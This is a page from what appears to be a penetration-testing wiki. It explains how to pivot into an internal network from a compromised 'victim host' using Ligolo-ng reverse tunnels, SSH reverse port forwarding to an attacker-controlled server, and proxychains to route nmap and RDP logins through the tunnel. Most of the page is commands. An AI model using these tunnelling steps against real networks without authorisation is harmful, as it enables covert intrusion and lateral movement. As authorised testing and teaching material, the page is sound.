Pentest List Wiki
  • What is Pentest List Wiki?
  • OFFENSIVE SECURITY
    • External Infrastructure
      • Discovery
        • Email Address Discovery
        • Subdomain Discovery
        • Data Discovery
        • Port & Service Discovery
      • Exploitation
        • Password Spraying
        • Vulnerability Scanning
    • Internal Infrastructure
      • General Discovery
        • AD Attack Path Discovery
        • Port & Service Discovery
      • Credential Discovery
        • Passwords and NetNTLM
        • SAM & LSA secrets
        • NTDS.dit secrets
        • LSASS secrets
        • DCSync
        • DPAPI secrets
      • Movement
        • Credential Spraying
        • SMB Relaying
        • Pass The Hash
      • Infiltration/Exfiltration
        • Pivoting (Proxying)
    • Web Application
      • Discovery
        • Testing API Keys
        • Vulnerability Scan
        • Web Content Discovery
        • Parameter Discovery
        • VHOST Discovery
        • CMS Scanners
      • Exploitation
        • Authentication
          • Email Address Forms
          • AWS Cognito
        • JSON Web Tokens
        • Injection Attacks
          • SQL Injection
          • Cross-Site Scripting
          • HTTP Headers
      • Bypasses
        • Cloudflare Bypass
        • HTTP 403 Bypass
    • Mobile (iOS/Android)
      • iOS
        • IPA Decryption
        • Filesystem Analysis
        • Static Analysis
    • Cloud
      • AWS
        • Vulnerability Scanners
        • S3 Buckets
      • Azure
        • Vulnerability Scanners
        • m365 & Entra ID
  • DEFENSIVE SECURITY
    • Forged Kerberos Tickets
    • Logon Event Visualisation
Powered by GitBook
On this page
  • Method 1: Ligolo-ng
  • Method 2: SSH Reverse Proxy
  • Sending tools through a pivot (using Proxychains)
  1. OFFENSIVE SECURITY
  2. Internal Infrastructure
  3. Infiltration/Exfiltration

Pivoting (Proxying)

How to pivot and proxy from an internal network

PreviousInfiltration/ExfiltrationNextWeb Application

Last updated 1 year ago

Method 1: Ligolo-ng

Ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve).

1) To run the proxy on your victim host:

./ligolo.exe -connect <IP>:<PORT> -ignore-cert

2) To run the server on your attack host:

  • Start server

    • sudo ./proxy -selfcert -laddr 0.0.0.0:<port>

  • List session once established and see networks

    • session

    • ifconfig

  • Add a route into the network via ligolo TUN adapter

    • sudo ip route add <Your_local_IPrange>/24 dev ligolo

  • start tunnel on ligolo

    • tunnel_start

Method 2: SSH Reverse Proxy

SSH can natively perform pivoting. In the example below, we have three machines:

  1. The SSH server

  2. The attack host

  3. The victim host (in an internal network)

  • On your SSH server, setup an SSH key:

    • ssh-keygen -C attacker@attacker

  • Add the generated public key to your SSH servers authorized keys list

    • /home/<user>/.ssh/authorized_keys

  • On your victim host, upload the generated private key and run the following command

    • ssh -i <SSHKey> -R 1037 -N <user>@<SSH_IP_Address>

  • On your attack host, make the reverse connection to the SSH server

    • ssh -i <sshkey> -L 8008:localhost:1037 -vN <user>@<SSH_IP_Address>

    • Now you have a connection from your attack host to the victim host and network

  • Now proxy any tools through the SOCKS proxy you created at 127.0.0.1:8008.

    • or use proxychains.

Sending tools through a pivot (using Proxychains)

proxychains forces any TCP connection made by any given application to follow through a proxy

1) Setup Proxychains with an established SOCKS Pivot

  • nano /etc/proxychains.conf

  • add socks4 127.0.0.1 9050

2) Execute tools using proxychains to route packets to local port 9050 and SSH forward to victim.

  • proxychains nmap -v -Pn -sT 172.16.5.19

    • Only full TCP scans work, SYN scans send half packets that SOCKS doesn't like

  • proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123

  • proxychains <yourtool>

https://github.com/sysdream/ligolo
https://github.com/haad/proxychains